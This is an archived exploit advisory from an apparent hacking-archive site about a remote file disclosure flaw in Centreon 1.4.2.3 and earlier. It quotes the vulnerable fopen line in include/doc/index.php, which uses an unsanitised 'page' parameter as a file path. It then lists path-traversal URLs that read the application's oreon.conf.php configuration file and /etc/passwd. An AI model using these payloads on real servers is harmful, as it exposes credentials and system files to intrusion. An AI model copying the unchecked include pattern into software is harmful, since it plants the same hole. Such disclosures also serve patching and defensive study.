AOH :: HP Unsorted C :: BX2171.HTM

Centreon <= 1.4.2.3 (index.php) Remote File Disclosure



Centreon <= 1.4.2.3 (index.php) Remote File Disclosure
Centreon <= 1.4.2.3 (index.php) Remote File Disclosure



[+] Info:

[~] Software: Centreon <= 1.4.2.3
[~] HomePage: http://www.centreon.com
[~] Exploit: Remote File Disclosure [High]
[~] Where: include/doc/index.php
[~] Bug Found By: Jose Luis G=F3ngora Fern=E1ndez|JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Spanish Hackers Team [SHT]

[+] Bug In include/doc/index.php:

[~] line 33: $doc = fopen("../doc/".$oreon->user->get_lang()."/".$_GET["page"], "r");

[+] Exploit:

[~] /include/doc/index.php?page=../../www/oreon.conf.php
[~] /include/doc/index.php?page=../../../../../etc/passwd
[~] /include/doc/index.php?page=[Local File]

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.